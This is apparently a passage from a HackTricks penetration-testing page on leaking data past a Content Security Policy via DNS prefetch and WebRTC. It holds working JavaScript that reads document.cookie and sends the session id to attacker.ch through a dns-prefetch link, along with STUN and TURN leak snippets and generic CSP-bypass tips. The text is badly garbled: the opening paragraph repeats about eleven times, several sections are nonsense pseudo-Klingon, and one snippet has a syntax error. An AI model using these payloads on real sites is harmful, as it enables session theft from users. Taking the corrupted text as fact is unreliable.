DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link reol="dns-prefetch" href="something.com">
You could abuse
var sessionid = document.cookie.split('=')[1]+".";
var body = document.getElementsByTagName('body')[0];
body.innerHTML = body.innerHTML + "<link rel=\"dns-prefetch\" href=\"//" + sessionid + "attacker.ch\">";
Another way:
Qapla'!
If the website has a Content Security Policy (CSP) in place, it may restrict the execution of certain types of content, such as JavaScript, inline scripts, or external resources. However, there are several techniques you can use to bypass CSP restrictions and potentially exploit the website.
-
Inline Event Handlers: CSP may block inline event handlers, such as
onclickoronload. To bypass this restriction, you can use event attributes that are not blocked by CSP, such asonerrororonmouseover. -
Data URIs: CSP may block the use of external resources, such as images or scripts. However, you can bypass this restriction by using data URIs to embed the content directly into the HTML document.
-
Nonce-based CSP Bypass: If the website uses a nonce-based CSP, you can try to bypass it by injecting a script tag with a valid nonce value obtained from the website's response headers.
-
CSP Header Manipulation: In some cases, you may be able to manipulate the CSP header itself by injecting a malicious header or modifying the existing one. This can allow you to bypass CSP restrictions and execute arbitrary code.
-
CSP Whitelist Bypass: If the website has a whitelist-based CSP, you can try to find a way to include your malicious content in the whitelist, allowing it to bypass CSP restrictions.
Remember, bypassing CSP can be a complex task and may require a deep understanding of the website's architecture and CSP implementation. Always ensure that you have proper authorization and legal permission before attempting any bypass techniques.
Qapla'!
const linkEl = document.createElement('link');
linkEl.rel = 'prefetch';
linkEl.href = urlWithYourPreciousData;
document.head.appendChild(linkEl);
HTTP Header:
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'none'; media-src 'self'; frame-src 'self'; child-src 'self'; form-action 'self'; frame-ancestors 'none'; base-uri 'self'; manifest-src 'self'; worker-src 'self'; report-uri /csp-report-endpoint/
Translation:
**HTTP Header:**
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'none'; media-src 'self'; frame-src 'self'; child-src 'self'; form-action 'self'; frame-ancestors 'none'; base-uri 'self'; manifest-src 'self'; worker-src 'self'; report-uri /csp-report-endpoint/
X-DNS-Prefetch-Control: off
{% hint style="info" %} Qapla', vaj vItlhutlh! {% endhint %}
WebRTC
QaStaHvIS, WebRTC CSP-nIj connect-src qaybta qawHaq jImej.
Qapla' 'e' vItlhutlh DNS request vItlhutlh. 'ej pongwI'pu' vItlhutlh:
(async()=>{p=new RTCPeerConnection({iceServers:[{urls: "stun:LEAK.dnsbin"}]});p.createDataChannel('');p.setLocalDescription(await p.createOffer())})()
Another option:
tlhIngan Hol:
ghItlh'a' vItlhutlh:
# ghItlh'a' vItlhutlh
## tlhIngan Hol:
ghItlh'a' vItlhutlh:
HTML:
<h1>ghItlh'a' vItlhutlh</h1>
<h2>tlhIngan Hol:</h2>
<p>ghItlh'a' vItlhutlh:</p>
var pc = new RTCPeerConnection({
"iceServers":[
{"urls":[
"turn:74.125.140.127:19305?transport=udp"
],"username":"_all_your_data_belongs_to_us",
"credential":"."
}]
});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
Checking CSP Policies Online
Automatically creating CSP
https://csper.io/docs/generating-content-security-policy
References
- https://hackdefense.com/publications/csp-the-how-and-why-of-a-content-security-policy/
- https://lcamtuf.coredump.cx/postxss/
- https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d
- https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme
- https://www.youtube.com/watch?v=MCyPuOWs3dg
- https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/
- https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/
Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!
Hacking Insights
Engage with content that delves into the thrill and challenges of hacking
Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights
Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates
Join us on Discord and start collaborating with top hackers today!
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.